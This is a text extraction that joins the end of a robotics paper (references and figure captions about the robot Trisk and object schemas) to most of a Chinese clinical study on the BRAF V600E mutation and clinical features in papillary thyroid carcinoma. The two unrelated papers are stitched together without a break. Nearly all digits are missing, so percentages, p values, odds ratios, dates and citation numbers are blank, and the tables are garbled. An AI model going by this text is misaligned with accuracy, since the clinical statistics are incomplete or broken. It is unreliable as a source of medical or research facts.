well -- that are consistent with whatever environment they find themselves in. acknowledgments this paper is partly based upon work supported under a national science foundation graduate research fellowship. we thank bruce blumberg and rod brooks for discussions that helped shape the work presented here. we also thank jonathan huggins, thananat jitapunkul, peter lai, john mcbean, kailas narendran, philipp robbel, kleovoulos tsourides, david wang, and jonathan wang, for their time and effort with numerous aspects of the robot system implementation. references [ ] m.a.arbib, t. iberall, and d. lyons. schemas that integrate vision and touch for hand control. in vision, brain, and cooperative computation, m.a. arbib and a.r. hanson, eds., mit press, , pp. – . [ ] c. bauckhage, j. fritsch, k. rohlfing, s. wachsmuth, and g. sagerer. evaluating integrated speech and image understanding. 
in proceedings of the ieee international conference on multimodal interfaces (icmi), , pp. – . [ ] p. beeson, m. macmahon, j. modayil, a. murarka, b. kuipers, and b. stankiewicz. integrating multiple representations of spatial knowledge for mapping, navigation, and communication. in proceedings of the aaai spring symposium on control mechanisms for spatial knowledge processing in cognitive / intelligent systems, . [ ] s. belongie, j. malik, and j. puzicha. shape matching and object recognition using shape contexts. ieee transactions on pattern analysis and machine intelligence, ( ), , pp. – . [ ] m. berlin, j. gray, a.l. thomaz, and c. breazeal. perspective taking: an organizing principle for learning in human-robot interaction. in proceedings of the twenty-first national conference on artificial intelligence (aaai), . [ ] c. breazeal, m. berlin, a. brooks, j. gray, and a.l. thomaz. using perspective taking to learn from ambiguous demonstrations. journal of robotics and autonomous systems, special issue on robot programming by demonstration, ( ), . [ ] r.a. brooks. a robust layered control system for a mobile robot. ieee journal of robotics and automation, , , pp. – . [ ] r.a. brooks. intelligence without representation. artificial intelligence, , , pp. – . [ ] j. bruce, t. balch, and m. veloso. fast and inexpensive colour image segmentation for interactive robots. in proceedings of the ieee/rsj international conference on intelligent robots and systems (iros), . [ ] j. j. bryson. intelligence by design: principles of modularity and coordination for engineering complex adaptive agents. phd thesis, massachusetts institute of technology, . [ ] j. j. bryson and l. a. stein. modularity and design in reactive intelligence. in proceedings of the international joint conference on artificial intelligence, , pp. – . [ ] r. burke, d. isla, m. downie, y. ivanov, and b. blumberg. creature smarts: the art and architecture of a virtual brain. in proceedings of the game developers conference, , pp. – . [ ] a. cangelosi. the grounding and sharing of symbols. pragmatics and cognition, , , pp. – . [ ] a. clark and j. toribio. doing with representing. synthese, , , pp. – . [ ] d. comaniciu and p. meer. mean shift: a robust approach toward feature space analysis. ieee transactions on pattern analysis and machine intelligence, ( ), . [ ] g. drescher. made-up minds: a constructivist approach to artificial intelligence. mit press, . [ ] p. fitzpatrick. from first contact to close encounters: a developmentally deep perceptual system for a humanoid robot. phd thesis, massachusetts institute of technology, . [ ] p. fitzpatrick and g. metta. grounding vision through experimental manipulation. philosophical transactions of the royal society: mathematical, physical, and engineering sciences, ( ), , pp. – . [ ] e. gat. integrating planning and reaction in a heterogeneous asynchronous architecture for controlling mobile robots. in proceedings of the tenth national conference on artificial intelligence (aaai), . [ ] e. gat. three-layer architectures. in artificial intelligence and mobile robots, d. krotenkamp, r.p. bannasso, and r. murphy, eds., aaai press, . [ ] j. j. gibson. the ecological approach to visual perception. erlbaum, . [ ] p. gorniak and d. roy. situated language understanding as filtering perceived affordances. cognitive science, ( ), , pp. – . [ ] k. hsiao and d. roy. a habit system for an interactive robot. in aaai fall symposium: from reactive to anticipatory cognitive embodied systems, . [ ] d. 
isla, r. burke, m. downie, and b. blumberg. a layered brain architecture for synthetic creatures. in proceedings of international joint conferences on artificial intelligence, . [ ] l.s. lopes and j.h. connell. semisentient robots: routes to integrated intelligence. ieee intelligent systems, , , pp. – . [ ] l.s. lopes and a. teixeira. human-robot interaction through spoken language dialogue. in proceedings of the ieee/rsj international conference on intelligent robots and systems, . [ ] j. modayil and b. kuipers. where do actions come from? autonomous robot learning of objects and actions. in proceedings of the aaai spring symposium on control mechanisms for spatial knowledge processing in cognitive / intelligent systems, . [ ] n. j. nilsson. shakey the robot. technical report , ai center, sri international, . [ ] j. piaget. the construction of reality in the child. basic books, . [ ] t. regier and l. carlson. grounding spatial language in perception: an empirical and computational investigation. journal of experimental psychology, ( ), , pp. – . [ ] d. roy. grounding words in perception and action: computational insights. trends in cognitive science, ( ), , pp. – . [ ] d. roy. semiotic schemas: a framework for grounding language in action and perception. artificial intelligence, ( - ), , pp. – . [ ] d. roy. a mechanistic model of three facets of meaning. in symbols and embodiment, m.d. vega, g. glennberg, and g. graesser, eds., oxford university press, . [ ] d. roy, k. hsiao, and n. mavridis. mental imagery for a conversational robot. ieee transactions on systems, man, and cybernetics, , , pp. – . [ ] d. roy and e. reiter. connecting language to the world. artificial intelligence, ( - ), , pp. – . [ ] j.m. siskind. grounding the lexical semantics of verbs in visual perception using force dynamics and event logic. journal of artificial intelligence research, , , pp. – . [ ] m. skubic, d. perzanowski, s. blisard, a. schultz, w. adams, m. bugajska, and d. brock. spatial language for human-robot dialogs. ieee transactions on smc part c, special issue on human- robot interaction, ( ), , pp. – . [ ] l. steels and t. belpaeme. coordinating perceptually grounded categories through language: a case study for colour. behavioural and brain sciences, , , pp. – . [ ] a. stoytchev. behaviour-grounded representation of tool affordances. in proceedings of ieee international conference on robotics and automation (icra), . [ ] p. vogt and f. divina. social symbol grounding and language evolution. interaction studies, ( ), , pp. – . [ ] t. winograd. understanding natural language. academic press, . figure . the robot, trisk, is facing a scene that includes a red apple and a green block. a) trisk is told, “group the green block and the red apple.” this request could be satisfied by moving the block towards the apple, or vice versa. the robot decides to move the apple. b) while the robot reaches for the apple, the human adds, “the red apple is heavy.” knowing that heavy objects are more difficult to lift, the robot changes its plan and c) moves the green block d) towards the apple instead. this example demonstrates the responsiveness of the system to new information. figure . an smpa hybrid model connects language use to a model of the physical world. responsive behaviours can be run at a higher priority independently of the smpa modules, enabling responsiveness but remaining separate from the main system. figure . 
in our model, responsive processes (small ellipses, with small arrows depicting information passed in and out) are organized into object schemas (large boxes). the processes handle the various functions needed to maintain the object schema and connect to language.
figure . visual notation for four example interaction processes with various run states and finish states.
figure . visual notation for interaction history data generated by interaction processes. for simplicity, not all history data will be shown for processes depicted in such diagrams.
figure . an object schema, containing three interaction processes relevant to its represented object. the reference process is depicted on the edge of the object schema to denote that it controls the object schema by including or removing other processes from the schema. for simplicity, not all processes in an object schema will be shown in these diagrams.
figure . top: the visual location associated with this example object schema leads to (denoted by the small arrow) an expectation that the corresponding grasp action will complete successfully. bottom: the grasp action is completed and reports a failure.
figure . an example plan hierarchy, showing the primary “social” motivation connected to a tree of interaction processes. the arrows denote a parent-child relation, and indicate that the parent cannot be completed until the child completes. the tree consists of action processes, condition processes, and plan fragment processes.
figure . top: the visual segmenter produces a list of coloured regions from a frame of visual input. middle: based on their histories, the visual trackers of two object schemas have expected attributes for how their visual regions will appear in the new frame. bottom: the visual trackers have claimed the regions from the visual segmenter's interaction history, and copied the new visual data to their own histories.
figure . top: the unclaimed visual segment from figure triggers the creation of a new object schema in the belief context. bottom: the new schema's coordination process immediately creates trackers and translators which populate the history data for the object schema.
figure . the planning system must choose between two plan fragments, both of which might satisfy the “grouped” condition process.
figure . a completed plan hierarchy for grouping the green block (object ) and the red apple (object ). action processes are typically deleted when they complete, but they are depicted here to show the entire structure. temporal sequences for children of plan fragments are shown left-to-right.
braf v e mutation in ptc research relationship between braf v e and clinical features in papillary thyroid carcinoma changjiao yan*, meiling huang*, xin li, ting wang and rui ling department of thyroid, breast and vascular surgery, xijing hospital, fourth military medical university, xi’an, shaanxi, china correspondence should be addressed to r ling or t wang: lingruiaoxue@ .com or ting_w @ .com *(c yan and m huang contributed equally to this work) abstract objective: to investigate the mutant status of braf gene and analyze its relationship to epidemiological risk factors and clinical outcomes among patients with papillary thyroid cancer (ptc) in the largest, single-institution chinese cohort to date. methods: the medical records of ptc patients were reviewed in this retrospective study. single-factor and multiple logistic regression analyses were applied to identify risk factors for braf v e mutation. survival outcomes including distant metastatic and persistent or recurrent ptc were examined, with a mean follow-up time of . ( – ) months. results: the braf v e mutation was present in . % of patients ( of ). correlation was found between braf v e mutation and several epidemiological features, including age, concomitant hypertension and hashimoto thyroiditis (ht). for the clinicopathological features, braf v e was significantly associated with bilateral multifocality (odds ratio (or) . , % confidence interval (ci) . – . , p <  . ) and less lateral lymph node metastases (or . , % ci . – . , p <  . ). smaller tumor size and advanced disease stage were significant in single-factor analyses but became insignificant after multivariate adjustment. no association was found between braf v e mutation and extrathyroidal invasion, distant metastatic and disease persistence or recurrence. conclusion: part of epidemiological features are independent risk or protective factors for braf v e mutation. the presence of braf v e mutation is not an aggressive prognosis on poor clinical outcomes in ptc. however, the high prevalence of braf v e may provide guidance for surgery strategy and opportunity for targeted treatment in recurrent and advanced stage disease. introduction thyroid cancer, especially papillary subtype, is the most common malignancy in the endocrine system ( ). papillary thyroid cancer (ptc) can be further classified into conventional variant (cptc), follicular variant (fvptc) and other rare variants ( ). despite ptc is usually a well-differentiated thyroid carcinoma with a favorable prognosis, its incidence has been sharply rising in many countries over the last decades ( ) (the average incidence in the usa was . % from to and . % from to ( )). in addition, recurrence and metastases are common for a small proportion of ptcs who reach advanced disease stages ( ). in recent years, molecular markers have received extensive attention to improving risk stratification of ptc ( ). braf is the main subtype of raf kinase and plays a key role in tumorigenesis. the mutation of braf v e - - key words f papillary thyroid cancer f braf v e f epidemiological features f clinicopathological features endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:lingruiaoxue@ .com mailto:ting_w @ .com https://creativecommons.org/licenses/by-nc-nd/ . 
/ https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc pb– : could trigger tumorigenesis through constitutively activating mapk pathway ( ). as the most common mutation observed in ptc, braf v e has received special attention in various ethnic populations since this protein kinase may contribute to cell proliferation, growth and division. however, due to the limited large cohort evidence, the function of braf v e as a biomarker in driving aggressiveness in ptc continues debatable ( , ). the majority of researches claimed that braf v e mutation was associated with poor clinicopathologic outcomes in patients with ptc, such as large tumor size, lymph node metastases, advanced clinical stages and recurrence ( , ). by contrast, several studies suggested that braf v e mutation had no significant association with clinical stage, multicentricity or recurrence ( , ). these equivocal findings have hindered the fact that whether the mutation had an impact on aggressive behavior of ptc. furthermore, most researches have focused on the relationship between mutation and clinicopathological characteristics, but the epidemiologic factors related to braf v e mutations were rarely studied in previous researches. here, we investigated epidemiological characteristics that may be associated with the mutation of braf v e and then studied the role of braf v e mutation in the clinicopathological features of ptc. patients and methods patient identification and clinicopathologic data collection this study included patients ( women and men) age . ± .   years (mean ± s.d.) who were diagnosed with ptc and underwent surgery between january and july at the department of the thyroid, breast and vascular surgery in xijing hospital. these patients were clinically observed with mean follow-up time of .  months (range –  months) after the initial treatments. all these patients were regularly followed with physical examinations, thyroid function tests and neck ultrasonography every –  months after the initial surgery. if suspicious or indeterminate thyroid nodules or lymph nodes were found, ultrasound-guided fine-needle aspiration cytology (us-fnac) was used for evaluation. between january and july , patients were diagnosed with thyroid cancer. among these, patients ( . %) were diagnosed with ptc, and patients ( . %) were diagnosed with other types of thyroid carcinoma. ptc patients without braf v e status or lost to follow-up were excluded. the flow diagram of patient included was shown in fig.  . after institutional review board approval and informed patient consenting, we retrospectively collected detailed braf v e and clinicopathologic data from institutional patient records. the epidemiological data and clinicopathological features were summarized in tables  and , respectively. patients with alcohol history was defined as patients who drinking more than twice a month and lasting more than   year. patients with smoking history was defined as patients who had a current or past smoking history of ≥  months. tumor node metastasis (tnm) stages were defined based on the seventh edition of the american joint committee on cancer (ajcc) staging system. persistent or recurrent disease was defined as the presence of a structural abnormality confirmed by cytological or surgical pathology after the initial surgery. 
the braf v e mutation results had no influence on the treatment decision making. figure  flow diagram of patient included according to the inclusion and exclusion criteria. patients diagnosed with thyroid carcinoma excluded follicular thyroid cancer medullary thyroid cancer anaplastic thyroid cancer papillary thyroid carcinoma excluded was short of braf v e mutational results was lost follow-up care not providing complete epidemiological and clinicopathological features patients were included in this study this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc : mutational analyses braf v e mutational analyses were performed by pathologists after surgical treatments of patients. dna was isolated from formalin-fixed, paraffin-embedded (ffpe) tissue blocks by sds-proteinase k method and subjected to amplification refractory mutation system (arms)- real-time pcr for the detection of braf v e mutations. dna was extracted from each sample via a commercial kit (ffpe dna reagent, cat no. adx-ff ) according to the manufacturer’s instructions. typically, μm sections ( – pieces) were carefully micro-dissected from ffpe tissue blocks. the sections were initially treated with . ml xylene/ethanol three times, then digested during an overnight incubation with μl proteinase k solution and μl buffer dtl in a °c rotating incubator, and dna purification was performed through qiagen columns, according to the manufacturer’s instructions. then, the most common t a transversion (braf v e) mutation was studied. the pcr was used to amplify exon of the braf gene, which was detected by braf v mutations detection kit (applied by adx-br , amoydx company, china) according to the manufacturer’s instructions. pcr primer sequences were as follows: table  association of braf v e with epidemiologic features of all ptc. braf v e mutation (−) braf v e mutation (+) χ p valueno. (%) no. (%) total no. of cases ( . ) ( . ) age at diagnosis  ≤ ( . ) ( . ) . < .  > ( . ) ( . ) sex  male ( . ) ( . ) . .  female ( . ) ( . ) family history of cancer  had any family member(s) with history of cancer ( . ) ( . ) . .  none ( . ) ( . ) presence of history of cancer  had any other cancer ( . ) ( . ) . .  none ( . ) ( . ) presence of smoking history  ever ( . ) ( . ) . .  never ( . ) ( . ) presence of alcohol history  ever ( . ) ( . ) . .  never ( . ) ( . ) concomitant diabetes  yes ( . ) ( . ) . .  no ( . ) ( . ) concomitant hypertension  yes ( . ) ( . ) . < .  no ( . ) ( . ) concomitant benign thyroid diseases  hyperthyroid   yes ( . ) ( . ) / .   no ( . ) ( . )  nodular goiter   yes ( . ) ( . ) . .   no ( . ) ( . )  ht   yes ( . ) ( . ) . < .   no ( . ) ( . ) the chi-square test (χ test) or, for small cell sizes, fisher’s exact test was employed to examine the significance of association between braf v e and epidemiologic features. p value < . was treated as statistically significant. bold indicates statistical significance. ‘/’ means no χ value because cell sizes were small and fisher’s exact test was employed. 
forward primer, tctgtagcagccctcagtagcgaagcagtgattttggtctagctacaga; reverse primer, agccctcagtagcgaagcaactcagcagcatctcagg. braf gene reactions were performed in a final volume of μl using – ng of genomic dna as template, with × buffer including pmol forward primer, pmol reverse primer, . pmol dntps, pmol mgcl2, pmol mutant probe and unit of taq polymerase. each reaction included a positive and a negative control sample; in the negative sample, the dna template was substituted by water. pcr cycling started with an initial denaturation step at °c for min, followed by cycles of denaturation ( °c, s), annealing ( °c, s) and extension ( °c, s), and a final extension of min at °c. pcr efficiency was determined by measuring the ct value of the fam signal.

table: relationship of braf v600e with clinicopathological features of all ptc, giving the number (%) of patients without and with the mutation, χ² and p value for total cases, surgery (lobectomy vs total thyroidectomy), histological type (cptc vs fvptc), tumor size, lesions (unilateral vs bilateral), extrathyroidal invasion, vascular invasion, status and site of lymph node metastases, disease stage (7th edition), distant metastasis, and persistent or recurrent disease. the chi-square test (χ² test) or, for small cell sizes, fisher's exact test was employed to examine the significance of association between braf v600e and clinicopathological features. a p value < . was treated as statistically significant. bold indicates statistical significance. tumor size is summarized with medians (quartiles). '/' means no χ² value because cell sizes were small and fisher's exact test was employed. '%' is the proportion of patients with or without braf v600e mutations in the subgroup of patients. 'a' indicates missing cases in 'status of lymph node metastases': some patients with and without braf v600e mutations had undetermined lymph node metastasis status. 'b' indicates missing cases in 'disease stage': the disease stage of three patients without braf v600e mutations and of some patients with the mutation could not be determined. cptc, conventional papillary thyroid carcinoma; fvptc, follicular variant papillary thyroid carcinoma.
statistical analyses

data related to histologic characteristics, patient epidemiological data and clinical outcomes were collected. categorical data were summarized with frequencies and percentages. continuous data were summarized with means ± standard deviations (if normally distributed) or medians and quartiles (if not normally distributed). the chi-square test (χ² test) or, for small cell sizes, fisher's exact test was employed to examine categorical variables. all p values were two-sided, and a p value < . was treated as statistically significant. pooled ors with their corresponding % confidence intervals ( % cis) were calculated to assess the relationship between braf v600e mutation and clinicopathological features. all statistical analyses were conducted with spss (version . ).
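the contingency-table tests and odds ratios described above can be illustrated with a small sketch. this is only an illustration under assumed inputs, not the authors' spss workflow: the dataframe `df`, its column names and the small-cell threshold of 5 are hypothetical.

```python
# Illustrative sketch only: `df`, the column names and the small-cell threshold
# are assumptions; the study itself used SPSS.
import numpy as np
import pandas as pd
from scipy import stats

def test_association(df, feature, mutation_col="braf_v600e"):
    """Chi-square test of independence between a categorical feature and
    mutation status, falling back to Fisher's exact test for small 2x2 cells."""
    table = pd.crosstab(df[feature], df[mutation_col])
    chi2, p, dof, expected = stats.chi2_contingency(table)
    if table.shape == (2, 2) and (expected < 5).any():
        _, p = stats.fisher_exact(table.values)
        return {"test": "fisher", "p": p}
    return {"test": "chi2", "chi2": chi2, "p": p}

def odds_ratio_ci(table_2x2, alpha=0.05):
    """Odds ratio with a Wald-type confidence interval for a 2x2 table
    laid out as [[a, b], [c, d]]; assumes no zero cells."""
    (a, b), (c, d) = np.asarray(table_2x2, dtype=float)
    or_ = (a * d) / (b * c)
    se = np.sqrt(1 / a + 1 / b + 1 / c + 1 / d)
    z = stats.norm.ppf(1 - alpha / 2)
    return or_, (np.exp(np.log(or_) - z * se), np.exp(np.log(or_) + z * se))

# A multivariate model in the spirit of the logistic regression reported below
# could be fit, for example, with statsmodels (variable names hypothetical):
#   import statsmodels.formula.api as smf
#   fit = smf.logit("braf_v600e ~ age + hypertension + ht + bilateral", df).fit()
#   odds ratios and 95% CIs: np.exp(fit.params), np.exp(fit.conf_int())
```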
results

braf v600e mutation in ptc

there were patients included in the study, with an average age of . ± . (range – ), and . % of the patients were female ( women and men). the braf v600e mutation was found in of ( . %) cptcs and of ( . %) fvptcs, with an overall prevalence of . % ( of ). no significant difference in braf v600e mutation was observed between female and male patients (p = . ). with regard to age, a significant difference in braf v600e incidence was found between patients aged ≤ and > years ( . vs . %, p < . ). to further investigate the influence of age on mutational incidence, we divided all patients into a children/adolescent group (≤ years) and adult groups of various age ranges ( – , – , – , > years old). as shown in fig. , patients were more prone to be braf v600e positive with increasing age.

figure: the correlation between the presence of the braf v600e mutation and the age of patients at the time of diagnosis (proportion of braf v600e-positive and -negative patients by age group).

association of braf v600e and epidemiological features in ptcs

to identify epidemiological factors associated with the braf v600e mutation, the relationship between epidemiological features and the mutation was investigated. in the univariate analysis of ptcs (table ), the presence of the braf v600e mutation was found to be significantly associated with several epidemiological features, including age at diagnosis, family history of cancer, concomitant diabetes, hypertension and hashimoto thyroiditis (ht). the incidence of braf v600e mutations in patients with a family history of cancer was higher than in patients without a family history of cancer ( . vs . %, p = . ). interestingly, patients with diabetes or hypertension presented higher mutation rates than those without diabetes or hypertension ( . vs . %, p = . ; . vs . %, p < . ). conversely, patients with concomitant ht displayed fewer braf v600e mutations than patients without ht ( . vs . %, p < . ). similarly, patients with hyperthyroidism or nodular goiter showed a lower mutation frequency than those without hyperthyroidism or nodular goiter, but the association was not significant. apart from the factors mentioned above, no significant association was found between the presence of the braf v600e mutation and other features, including gender, presence of a history of cancer, and presence of a smoking or alcohol history.

relationship of braf v600e and clinicopathological features in ptcs

in the univariate analysis of all ptcs (table ), the presence of braf v600e was found to be significantly associated with small tumor size (p = . ), bilateral multifocality (p = . ), less frequent simultaneous central and lateral lymph node metastases (p < . ) and advanced disease stage (iii and iv) (p = . ). although the association was not significant, braf v600e mutations were less frequent in patients with lymph node metastases than in patients without lymph node metastases ( . vs . %, p = . ). furthermore, it is worth noting that braf v600e was less frequent in patients with aggressive lymph node metastases (central and lateral metastases at the same time) than in patients with only central or only lateral lymph node metastases ( . vs . % or . %, p < . ). no significant association was found between the braf v600e mutation and other high-risk clinicopathologic characteristics, such as extrathyroidal invasion (p = . ), vascular invasion (p = . ), distant metastasis (p = . ) and ptc persistence or recurrence (p = . ).

multivariate logistic regression analysis of braf v600e mutation in ptcs

to further confirm the relationship between braf v600e and epidemiological or clinicopathological features, multivariate logistic regression analysis was performed (table ). the results showed that age (p = . , or = . , % ci = . – . ), concomitant hypertension (p = . , or = . , % ci = . – . ) and lesions (p = . , or = . , % ci = . – . ) were positive independent factors for braf v600e mutation. in contrast, concomitant ht (p < . , or = . , % ci = . – . ) and lateral lymph node metastases (p < . , or = . , % ci = . – . ) were negative independent factors for braf v600e mutation. after adjustment for patients' age and sex, the association between braf v600e mutation and disease stage was not statistically significant (p = . , or = . , % ci = . – . ).

table: multivariate logistic regression analysis of braf v600e mutation in all ptc, reporting p values, odds ratios (or) and % confidence intervals ( % ci) for age at diagnosis, sex, family history of cancer, concomitant diabetes, concomitant hypertension, concomitant ht, tumor size, lesions (unilateral vs bilateral), site of lymph node metastasis (central, lateral) and disease stage (7th edition; i + ii vs iii + iv). age at diagnosis is summarized with means ± standard deviations and tumor size with medians (quartiles). multivariate logistic regression analysis was employed to identify risk factors for braf v600e mutations. a p value < . was treated as statistically significant. bold indicates statistical significance. '%' is the proportion of patients with or without braf v600e mutations in the subgroup of patients. 'a' indicates missing cases in 'disease stage': the disease stage of three patients without braf v600e mutations and of some patients with the mutation could not be determined. ht, hashimoto thyroiditis; or, odds ratio; % ci, % confidence interval.

discussion

this study sought to find the epidemiological factors associated with the braf v600e mutation and to clarify the relationship between the braf v600e mutation and clinical outcomes in ptc. previously, the braf v600e mutation has been reported as an aggressive prognostic marker in ptc, although large cohort studies were scarce and there have been noteworthy inconsistencies among studies ( , ). in our analysis, we found a lack of correlation between the braf v600e mutation and either aggressive clinicopathological features or persistent or recurrent disease.

the incidence of the braf v600e mutation has increased in recent years, and the braf v600e mutation seems to have gradually become an accompanying phenomenon in ptc patients. xing et al. reported a braf v600e rate of . % in patients between and ( ). in , kebebew et al. reported a braf v600e prevalence of . % ( ). in , kurtulmus et al. reported a braf v600e mutation rate of . % in ptcs ( ). a meta-analysis showed braf v600e mutations occurred in . % of ptcs (updated to august ) ( ). in , kim et al. reported that braf v600e mutations were present in . % of ptc patients ( of ) ( ), and we found a similar mutation rate in our sample. compared to previous studies, we update braf v600e mutation data from to . the reason why the mutation prevalence in our study is higher than the average may be ascribed to population aging in recent years and to differences in research methodology. in this study, the braf v600e mutations were tested from postoperative tissue samples using the arms real-time pcr method, which is more sensitive and robust at detecting braf v600e somatic mutations than dna sequencing of clinical samples ( ).

our study indicated that older age and concomitant hypertension were independent risk factors for the braf v600e mutation. on the contrary, concomitant ht was an independent protective factor for the mutation. despite being insignificant after multivariate adjustment, the presence of a family history of cancer was associated with a higher braf v600e mutation incidence in the univariate analysis, in agreement with the data reported in a previous study ( ). in addition, with the large size of this study, a negative correlation between ht and braf v600e mutation was demonstrated, which was confirmed in a recent smaller study ( ).
potential mechanisms and the immunological link that might lead to the synchronous appearance of ht and ptc have been investigated ( , ). if more clinical evidence accumulates, the correlation between braf v600e and family history of cancer, hypertension and ht may help promote the investigation of the braf v600e mutation mechanism. as for the factor of age, many studies have found that the incidence of braf v600e is higher in patients > years old ( , ), but few studies have reported a positive correlation between braf v600e and age (fig. ). compared to adults, ptc in pediatric and adolescent patients presents with more lymph node metastases, distant metastases and recurrence ( , ). taken together with the studies mentioned above, the lower number of braf v600e mutations in patients aged under years suggests that the aggressive features displayed in these patients may not be caused by the braf v600e mutation.

the aggressive role of braf v600e mutations has been widely investigated in previous studies ( , , ). however, our results did not show that the braf v600e mutation is a biomarker driving aggressiveness. given the high and increasing prevalence of the braf v600e mutation in recent years ( . %, on average, in the meta-analysis mentioned above ( ), and . % in our study), and the comparatively indolent behavior and rare recurrence and mortality of ptc ( and %, respectively) ( , ), an absence of association between the braf v600e mutation and these negative events seems logical. in univariate analyses, braf v600e mutations were significantly associated with smaller tumors, bilateral multifocality, advanced disease stage and less aggressive lymph node metastases in ptcs. advanced tnm stage was not significant after multivariate adjustment. therefore, bilateral multifocality seems to be the only risk factor associated with braf v600e. notably, a recent study showed that tumor multifocality has no independent prognostic value for outcomes of ptc ( ). other classic risk factors ( ), such as extrathyroidal extension, distant metastases and disease recurrence, were not significantly associated with the braf v600e mutation. therefore, the presence of braf v600e does not play an aggressive role associated with poor clinicopathologic outcomes in ptc. a recent publication has also called into question the relationship between the braf v600e mutation and prognosis in ptc: in an analysis of patients with the braf v600e mutation, henke et al. found that the mutation is not predictive of long-term outcome in ptc ( ).

although the presence of the braf v600e mutation is not an aggressive prognostic marker for poor clinical outcomes, surgical strategy and treatment guided by the presence of the mutation may still be valuable. such therapies might include determining the extent of surgery and the use of braf inhibitors. an association between braf v600e and bilateral lesions and less frequent lateral lymph node metastases was found in our study. if more clinical evidence becomes available in the future, the status of the braf v600e mutation may be considered as one of the factors for determining the extent of surgery, besides tumor size, extrathyroidal extension, vascular invasion, lymph node size and the willingness of patients ( ). furthermore, a considerable number of patients with the braf v600e mutation will have recurrence, since a majority of ptc patients in our cohort ( . %) had the mutation. we propose that high-risk patients with the braf v600e mutation use braf inhibitors, such as sorafenib, lenvatinib and vemurafenib. those patients might benefit from targeted therapy; sorafenib and lenvatinib have been approved for metastatic ptc ( ).

the greatest strengths of this study are its consecutive large cohort ( ptc patients) and its recent study period (from to ). the limitations of this study were as follows. first, a selection bias could occur in this retrospective single-center research; the large consecutive cohort of patients may help minimize this bias. second, follow-up time was short in this study (mean . months, range – months). research on the mechanism of the epidemiological features associated with the braf v600e mutation in ptcs should be carried out in the future.

in summary, this was a large consecutive retrospective study that investigated the relationship of the braf v600e mutation with epidemiological and clinicopathological features. older age and concomitant hypertension were independent risk factors for the braf v600e mutation. concomitant ht was an independent protective factor for the braf v600e mutation. bilateral multifocality was the only risk factor associated with braf v600e, but a recent study showed it has no independent prognostic value for outcomes of ptc. other poor clinicopathological features were not significantly associated with the mutation. although the presence of the braf v600e mutation is not an aggressive prognostic marker for poor clinical outcomes, surgery and treatment guided by the presence of the mutation may still be valuable.

declaration of interest

the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported.

funding

the authors would like to acknowledge support from the national natural science foundation of china (no. ).

ethical approval

consent was obtained from each patient after full explanation of the purpose and nature of all procedures used. the study was approved by an independent ethics committee of xijing hospital (first affiliated hospital of fourth military medical university).
references

pacini f & castagna mg. approach to and treatment of differentiated thyroid carcinoma. medical clinics of north america.
pellegriti g, frasca f, regalbuto c, squatrito s & vigneri r. worldwide increasing incidence of thyroid cancer: update on epidemiology and risk factors. journal of cancer epidemiology.
jung ck, little mp, lubin jh, brenner av, wells sa jr, sigurdson aj & nikiforov ye. the increase in thyroid cancer incidence during the last four decades is accompanied by a high frequency of braf mutations and a sharp increase in ras mutations. journal of clinical endocrinology and metabolism.
vuong hg, altibi am, abdelhamid ah, ngoc pu, quan vd, tantawi my, elfil m, vu tl, elgebaly a, oishi n, et al. the changing characteristics and molecular profiles of papillary thyroid carcinoma over time: a systematic review. oncotarget.
nikiforov ye & nikiforova mn. molecular genetics and diagnosis of thyroid cancer. nature reviews: endocrinology.
zhang q, liu sz, zhang q, guan yx, chen qj & zhu qy. meta-analyses of association between braf(v600e) mutation and clinicopathological features of papillary thyroid carcinoma. cellular physiology and biochemistry.
henke le, pfeifer jd, ma c, perkins sm, dewees t, el-mofty s, moley jf, nussenbaum b, haughey bh, baranski tj, et al. braf mutation is not predictive of long-term outcome in papillary thyroid carcinoma. cancer medicine.
tufano rp, teixeira gv, bishop j, carson ka & xing m. braf mutation in papillary thyroid cancer and its value in tailoring initial treatment: a systematic review and meta-analysis. medicine.
xing m, westra wh, tufano rp, cohen y, rosenbaum e, rhoden kj, carson ka, vasko v, larin a, tallini g, et al. braf mutation predicts a poorer clinical prognosis for papillary thyroid cancer. journal of clinical endocrinology and metabolism.
kim th, park yj, lim ja, ahn hy, lee ek, lee yj, kim kw, hahn sk, youn yk, kim kh, et al. the association of the braf(v600e) mutation with prognostic factors and poor clinical outcome in papillary thyroid cancer: a meta-analysis. cancer.
walczyk a, kowalska a, kowalik a, sygut j, wypiorkiewicz e, chodurska r, pieciak l & gozdz s. the braf(v600e) mutation in papillary thyroid microcarcinoma: does the mutation have an impact on clinical outcome? clinical endocrinology.
nam jk, jung ck, song bj, lim dj, chae bj, lee ns, park wc, kim js, jung ss & bae js. is the braf(v600e) mutation useful as a predictor of preoperative risk in papillary thyroid cancer? american journal of surgery.
russo m, malandrino p, nicolosi ml, manusia m, marturano i, trovato ma, pellegriti g, frasca f & vigneri r. the braf(v600e) mutation influences the short- and medium-term outcomes of classic papillary thyroid cancer, but is not an independent predictor of unfavorable outcome. thyroid.
gandolfi g, sancisi v, piana s & ciarrocchi a. time to re-consider the meaning of braf v600e mutation in papillary thyroid carcinoma. international journal of cancer.
xing m, liu r, liu x, murugan ak, zhu g, zeiger ma, pai s & bishop j. braf v600e and tert promoter mutations cooperatively identify the most aggressive papillary thyroid cancer with highest recurrence. journal of clinical oncology.
kebebew e, weng j, bauer j, ranvier g, clark oh, duh qy, shibru d, bastian b & griffin a. the prevalence and prognostic value of braf mutation in thyroid cancer. annals of surgery.
kurtulmus n, duren m, ince u, cengiz yakicier m, peker o, aydin o, altiok e, giray s & azizlerli h. braf(v600e) mutation in turkish patients with papillary thyroid cancer: strong correlation with indicators of tumor aggressiveness. endocrine.
kim sk, woo jw, lee jh, park i, choe jh, kim jh & kim js. chronic lymphocytic thyroiditis and braf v600e in papillary thyroid carcinoma. endocrine-related cancer.
